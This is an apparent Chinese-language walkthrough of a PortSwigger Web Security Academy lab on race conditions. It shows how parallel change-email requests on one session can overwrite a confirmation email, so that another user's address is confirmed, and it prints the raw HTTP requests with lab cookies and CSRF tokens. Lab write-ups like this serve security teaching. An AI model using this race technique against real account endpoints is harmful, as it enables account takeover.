Race conditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式中出现意外行为。
常见的攻击方法如下
- 饶过只限一次的申请
- 饶过爆力破解密码限制
- 饶过多步骤流程
- 单点请求
- 饶过基于时间的机制
4.单点请求
将具有不同值的平行请求传送到单一端点有时会触发强大的竞争条件,举例如下
正常请求
wiener更改email时会在cookie中带上自己的session: XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM ,body中的email参数指定新信箱位置,如下请求
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>POST /my-account/change-email HTTP/2
Host: 0ac200cb03ab64978078499c00c800c7.web-security-academy.net
Cookie: session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM
...omit...
email=wiener%40exploit-0ae5004603a6640680c94899011d00be.exploit-server.net&csrf=hd2siI7G44fAe6A6tw0r2LjlWmFMqds1</code></span></span>
接着系统会把email更改连结寄到新信箱,内容如下
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>####### wiener@exploit-0ae5004603a6640680c94899011d00be.exploit-server.net #######
To confirm your email change to wiener@exploit-0ae5004603a6640680c94899011d00be.exploit-server.net, click the link below
Click here to confirm.</code></span></span>
确认连结点击后会送出以下请求,服务器检查是刚wiener申请的token无误后就更改为此email
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>########### request ###########
GET /confirm-email?user=wiener&token=OP6H667c4JvNXmzh
...omit...
########### response ###########
...omit...
Your email has been successfully updated </code></span></span>
但如果送出2次email更改请求,只有最后一个email更改连结是有用的
但由于目标有漏洞,因此将相同会话同时发送两个密码重设请求,但使用两个不同的使用者,可能会导致互相覆写
发动攻击
以wiener身份(session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM)准备2个请求同时发送:
- 更改成wiener自己的email
- 更改为指定email:carlos@ginandjuice.shop
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>POST /my-account/change-email HTTP/2
Host: 0ac200cb03ab64978078499c00c800c7.web-security-academy.net
Cookie: session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM
...omit...
email=carlos@ginandjuice.shop&csrf=hd2siI7G44fAe6A6tw0r2LjlWmFMqds1</code></span></span>
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>POST /my-account/change-email HTTP/2
Host: 0ac200cb03ab64978078499c00c800c7.web-security-academy.net
Cookie: session=XWucQeA0PHPyZbfNSg0sRrunLdEEjYEM
...omit...
email=wiener%40exploit-0ae5004603a6640680c94899011d00be.exploit-server.net&csrf=hd2siI7G44fAe6A6tw0r2LjlWmFMqds1</code></span></span>
与是会产生2个token分别对应第一个请求token=xxxxxxxx1
和第二个请求token=xxxxxxxx2
如果漏洞利用成功,原本要寄给wiener@exploit
的内容就会被carlos@ginandjuice.shop
的内容和token复写,被复写的内容如下。因为不一定每次都能顺利互相覆写,如果没有就多试几次。
<span style="color:#292b2c"><span style="background-color:#e9e9e9"><code>####### wiener@exploit-0ae5004603a6640680c94899011d00be.exploit-server.net #######
To confirm your email change to carlos@ginandjuice.shop, click the link below
Click here to confirm.</code></span></span>
确认连结点击后会送出user=wiener&token=xxxxxxxx1
,服务器检查是刚申请的第1个请求,就更改为此email
其他方法可参考 Race conditions | 牛的大腦